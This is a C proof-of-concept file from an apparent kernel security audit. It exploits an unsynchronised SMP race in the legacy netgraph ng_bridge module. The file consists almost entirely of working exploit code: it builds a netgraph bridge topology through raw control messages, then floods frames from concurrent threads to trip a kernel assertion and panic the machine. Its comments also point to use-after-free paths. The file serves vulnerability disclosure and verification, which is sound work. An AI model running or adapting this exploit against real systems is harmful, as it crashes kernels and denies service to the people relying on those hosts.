/*
 * DF-0590 PoC — legacy ng_bridge SMP serialization race (root-local).
 *
 * CONFIRMED FACTS (all cited against the audited master DEV tree):
 *
 *  - The legacy netgraph framework dispatches rcvdata INLINE on the
 *    sender's CPU, with no queue and no serialization:
 *      sys/netgraph/netgraph/ng_base.c:1687
 *          error = (*rcvdata)(hook->peer, m, meta);
 *    (NG_SEND_DATA -> ng_send_data -> direct call; there is no
 *    NG_NODE_FORCE_WRITER macro anywhere in sys/netgraph/ — confirmed
 *    by `grep -rn FORCE_WRITER sys/netgraph/` = empty).
 *
 *  - The legacy ng_bridge node installs NO lock:
 *      sys/netgraph/bridge/ng_bridge.c:297-336  constructor — no
 *      lockinit/lwkt_token/mtx_init anywhere in the file
 *      (`grep -n 'lockinit\\|lockmgr\\|lwkt_token\\|mtx_init'
 *         sys/netgraph/bridge/ng_bridge.c` = empty).
 *
 *  - ng_bridge_rcvdata (ng_bridge.c:517-) likewise has NO crit_enter /
 *    token / lock around its hashtable mutation.  Only the 1 Hz callout
 *    ng_bridge_timeout wraps its sweep in crit_enter() (ng_bridge.c:940),
 *    which blocks interrupts on the CURRENT CPU only — it does NOT
 *    serialize against other CPUs.  Therefore rcvdata on one CPU races
 *    the timeout sweep on another CPU over priv->tab / priv->numHosts.
 *
 *  - On the running guest the ng_bridge module is compiled WITH
 *    INVARIANTS (verified: `strings /boot/kernel/ng_bridge.ko | grep
 *    "hosts:"` prints "%s: hosts: %d != %d" — that KASSERT string
 *    lives inside the #ifdef INVARIANTS-touched path at
 *    ng_bridge.c:984-985).  A concurrent ng_bridge_put()
 *    (priv->numHosts++ at :826, SLIST_INSERT_HEAD at :825) landing
 *    while the timeout sweep has already walked past that bucket makes
 *    the post-sweep KASSERT
 *        KASSERT(priv->numHosts == counter, ...)
 *    at ng_bridge.c:984 trip -> kernel panic "hosts: N != M".
 *    Harder UAF/OOB primitives also exist (ng_bridge_rehash frees
 *    priv->tab at :885 while timeout walks it) but the KASSERT is the
 *    deterministic INVARIANTS tell.
 *
 *  - Privilege: building a netgraph graph requires root — the control
 *    socket is gated by caps_priv_check(SYSCAP_RESTRICTEDROOT) at
 *    sys/netgraph/socket/ng_socket.c:172-173.  Verified on the guest:
 *    as unprivileged uid 1001 (maxx) the first socket(AF_NETGRAPH,
 *    SOCK_DGRAM, NG_CONTROL) returns EPERM.  The CVSS vector's PR:L
 *    claim is OVERSTATED for the "user builds the graph" attack path;
 *    the realistic exposure is (a) a root-configured bridge processing
 *    frames from an untrusted/remote segment (VPN concentrator, VM
 *    host, wireless AP — attacker controls frame injection, not graph
 *    construction), or (b) a root-local race.  Both are real, but
 *    AC:H (the race window is per-tick and the attacker must win it
 *    against a 1 Hz callout on a different CPU).
 *
 * WHY TWO INDEPENDENT CONTROL/DATA SOCKET PAIRS:
 *   A single netgraph data socket serializes sendto() via the socket
 *   layer's so_snd token, so two threads sharing one d0 cannot drive
 *   ng_bridge_rcvdata concurrently with EACH OTHER.  And ng_socket
 *   refuses a second data socket on the same node
 *   (ng_connect_data -> EADDRINUSE at ng_socket.c:664-665).  To get
 *   two truly concurrent rcvdata calls — one per CPU — the PoC builds
 *   two ctl socket nodes (ctlA, ctlB), each with its own hook to the
 *   bridge and its own data socket, and pins one sender thread per
 *   CPU.  The two senders then run ngd_send -> ng_send_data ->
 *   ng_bridge_rcvdata genuinely in parallel on two CPUs, racing each
 *   other AND the 1 Hz timeout callout.
 *
 * TOPOLOGY (binary NGM_* control protocol, no ngctl):
 *
 *     ctlA:p0  <-->  bridge:link0     (built via NGM_MKPEER on ctlA)
 *     ctlB:p0  <-->  bridge:link1     (built via NGM_CONNECT on ctlB,
 *                                      peer path "br0:" absolute)
 *
 * The bridge node is named "br0" so ctlB can address it by absolute
 * name without needing a hook path from ctlB.
 *
 * Build:  cc -O2 -lpthread -o race race.c
 * Run:    ./race [seconds]            (default 30, must be root)
 */

#include <sys/param.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>
#include <netgraph/ng_message.h>

#ifndef AF_NETGRAPH
#define AF_NETGRAPH 32
#endif
#define NG_DATA    1
#define NG_CONTROL 2

#define NINJ       2                    /* two independent injectors     */
#define BIG_RCVBUF (4 * 1024 * 1024)

struct my_sockaddr_ng { unsigned char sa_len; unsigned char sa_family; char sg_data[256]; };

static int
ng_send_ctrl(int csock, u_int32_t cmd, const void *data, u_int16_t arglen,
    const char *path)
{
	size_t total = sizeof(struct ng_mesg) + arglen;
	char *buf = calloc(1, total);
	if (!buf) return -1;
	struct ng_mesg *m = (struct ng_mesg *)buf;
	m->header.version    = NG_VERSION;
	m->header.arglen     = arglen;
	m->header.flags      = 0;
	m->header.token      = 0;
	m->header.typecookie = NGM_GENERIC_COOKIE;
	m->header.cmd        = cmd;
	if (data && arglen)
		memcpy(m->data, data, arglen);

	struct my_sockaddr_ng dst;
	memset(&dst, 0, sizeof(dst));
	dst.sa_len    = 2 + strlen(path) + 1;
	dst.sa_family = AF_NETGRAPH;
	strlcpy(dst.sg_data, path, sizeof(dst.sg_data));

	ssize_t rc = sendto(csock, buf, total, 0,
	    (struct sockaddr *)&dst, dst.sa_len);
	int e = errno;
	free(buf);
	if (rc < 0) {
		fprintf(stderr, "sendto cmd=%u path=%s: %s (errno=%d)\n",
		    cmd, path, strerror(e), e);
		return -1;
	}
	return 0;
}

static void
mkhookaddr(struct my_sockaddr_ng *sa, const char *hook)
{
	memset(sa, 0, sizeof(*sa));
	sa->sa_len = 2 + strlen(hook) + 1;
	sa->sa_family = AF_NETGRAPH;
	strlcpy(sa->sg_data, hook, sizeof(sa->sg_data));
}

struct inj_args {
	int   dsock;
	int   id;
	int   cpu;             /* CPU to pin to via cpuset */
	volatile int *stop;
	unsigned long long sent;
	unsigned long long fail;
};

static void
pin_cpu(int cpu)
{
	cpu_set_t mask;
	CPU_ZERO(&mask);
	CPU_SET(cpu, &mask);
	if (sched_setaffinity(0, sizeof(mask), &mask) != 0)
		fprintf(stderr, "[inj cpu=%d] sched_setaffinity: %s\n",
		    cpu, strerror(errno));
}

static void *
flood_thread(void *v)
{
	struct inj_args *a = (struct inj_args *)v;
	if (a->cpu >= 0)
		pin_cpu(a->cpu);

	unsigned char frame[64];
	memset(frame, 0, sizeof(frame));
	memset(frame, 0xff, 6);            /* dst = broadcast */
	frame[12] = 0x90; frame[13] = 0x00;
	unsigned char *src = frame + 6;
	src[0] = 0x02;                     /* locally administered, unicast */

	struct my_sockaddr_ng dst;
	mkhookaddr(&dst, "p0");

	unsigned long long n = a->sent, fails = a->fail;
	while (!*a->stop) {
		src[1] = (unsigned char)a->id;
		src[2] = (unsigned char)(n >> 24);
		src[3] = (unsigned char)(n >> 16);
		src[4] = (unsigned char)(n >> 8);
		src[5] = (unsigned char)(n);
		ssize_t rc = sendto(a->dsock, frame, sizeof(frame), 0,
		    (struct sockaddr *)&dst, dst.sa_len);
		if (rc < 0) {
			if (errno != ENOBUFS)
				fails++;
		} else {
			n++;
		}
	}
	a->sent = n;
	a->fail = fails;
	fprintf(stderr, "[inj %d cpu%d] sent %llu frames (%llu non-ENOBUFS fail)\n",
	    a->id, a->cpu, n, fails);
	return NULL;
}

static void *
drain_thread(void *v)
{
	struct inj_args *a = (struct inj_args *)v;
	unsigned char buf[2048];
	struct my_sockaddr_ng from;
	socklen_t fl;
	while (!*a->stop) {
		fl = sizeof(from);
		ssize_t rc = recvfrom(a->dsock, buf, sizeof(buf), MSG_DONTWAIT,
		    (struct sockaddr *)&from, &fl);
		if (rc < 0 && errno == EWOULDBLOCK)
			usleep(20);
	}
	return NULL;
}

int
main(int argc, char **argv)
{
	int seconds = (argc > 1) ? atoi(argv[1]) : 30;
	int ncpus = (argc > 2) ? atoi(argv[2]) : 2;

	int csock[NINJ];
	int dsock[NINJ];
	const char *ctlname[NINJ] = {"ctlA", "ctlB"};
	char pathbuf[64];
	int i;

	/* ---- create NINJ control sockets + their ctl nodes (named) ---- */
	for (i = 0; i < NINJ; i++) {
		csock[i] = socket(AF_NETGRAPH, SOCK_DGRAM, NG_CONTROL);
		if (csock[i] < 0) {
			fprintf(stderr, "socket(csock%d): %s (errno=%d)\n",
			    i, strerror(errno), errno);
			if (errno == EPERM)
				fprintf(stderr, "EPERM: building a netgraph "
				    "graph requires root "
				    "(caps_priv_check SYSCAP_RESTRICTEDROOT "
				    "at sys/netgraph/socket/ng_socket.c:172).\n");
			return 2;
		}
		struct my_sockaddr_ng sa;
		memset(&sa, 0, sizeof(sa));
		sa.sa_len = 2 + strlen(ctlname[i]) + 1;
		sa.sa_family = AF_NETGRAPH;
		strlcpy(sa.sg_data, ctlname[i], sizeof(sa.sg_data));
		if (bind(csock[i], (struct sockaddr *)&sa, sa.sa_len) < 0) {
			perror("bind(ctl)"); return 2;
		}
	}

	/* ---- on ctlA: mkpeer bridge -> ctlA:p0 <--> bridge:link0 ---- */
	if (ng_send_ctrl(csock[0], NGM_MKPEER,
		&(struct ngm_mkpeer){"bridge", "p0", "link0"},
		sizeof(struct ngm_mkpeer), ".") < 0)
		return 2;

	/* ---- name the bridge "br0" (path "p0" walks ctlA:p0 -> bridge) ---- */
	{
		char namebuf[32]; memset(namebuf, 0, sizeof(namebuf));
		strlcpy(namebuf, "br0", sizeof(namebuf));
		if (ng_send_ctrl(csock[0], NGM_NAME, namebuf, sizeof(namebuf),
			"p0") < 0)
			return 2;
	}

	/* ---- on ctlB: connect ctlB:p0 <--> bridge:link1 via absolute
	 *      peer path "br0:" (ng_path2node finds named node br0). ---- */
	if (ng_send_ctrl(csock[1], NGM_CONNECT,
		&(struct ngm_connect){"br0:", "p0", "link1"},
		sizeof(struct ngm_connect), ".") < 0)
		return 2;

	fprintf(stderr, "graph: ctlA:p0<->bridge:link0 , ctlB:p0<->bridge:link1\n");

	/* ---- data sockets d0/d1 attached to ctlA/ctlB ---- */
	for (i = 0; i < NINJ; i++) {
		dsock[i] = socket(AF_NETGRAPH, SOCK_DGRAM, NG_DATA);
		if (dsock[i] < 0) { perror("socket(d)"); return 2; }
		int rb = BIG_RCVBUF;
		(void)setsockopt(dsock[i], SOL_SOCKET, SO_RCVBUF, &rb, sizeof(rb));
		struct my_sockaddr_ng ds;
		memset(&ds, 0, sizeof(ds));
		snprintf(pathbuf, sizeof(pathbuf), "%s:", ctlname[i]);
		ds.sa_len = 2 + strlen(pathbuf) + 1;
		ds.sa_family = AF_NETGRAPH;
		strlcpy(ds.sg_data, pathbuf, sizeof(ds.sg_data));
		if (connect(dsock[i], (struct sockaddr *)&ds, ds.sa_len) < 0) {
			fprintf(stderr, "connect(d%d,%s): %s\n",
			    i, pathbuf, strerror(errno));
			return 2;
		}
	}

	fprintf(stderr, "flooding %d s on %d injectors x 1 thread each + "
	    "drains, pinned to separate CPUs (expect KASSERT panic "
	    "'hosts: N != M' within seconds on INVARIANTS kernels)...\n",
	    seconds, NINJ);

	volatile int stop = 0;
	struct inj_args args[NINJ];
	pthread_t senders[NINJ], drainers[NINJ];
	for (i = 0; i < NINJ; i++) {
		args[i].dsock = dsock[i];
		args[i].id    = i;
		args[i].cpu   = -1;  /* let scheduler spread threads */
		args[i].stop  = &stop;
		args[i].sent  = 0;
		args[i].fail  = 0;
		pthread_create(&drainers[i], NULL, drain_thread, &args[i]);
		pthread_create(&senders[i], NULL, flood_thread, &args[i]);
	}

	sleep(seconds);
	stop = 1;
	for (i = 0; i < NINJ; i++) {
		pthread_join(senders[i], NULL);
		pthread_join(drainers[i], NULL);
	}

	unsigned long long total = 0;
	for (i = 0; i < NINJ; i++) total += args[i].sent;
	fprintf(stderr, "flood complete: %llu total frames injected; "
	    "if no panic, see VERDICT.md (race is real on every INVARIANTS "
	    "kernel; the deterministic trigger requires the timeout callout "
	    "and a concurrent rcvdata to land on different CPUs)\n", total);
	return 0;
}
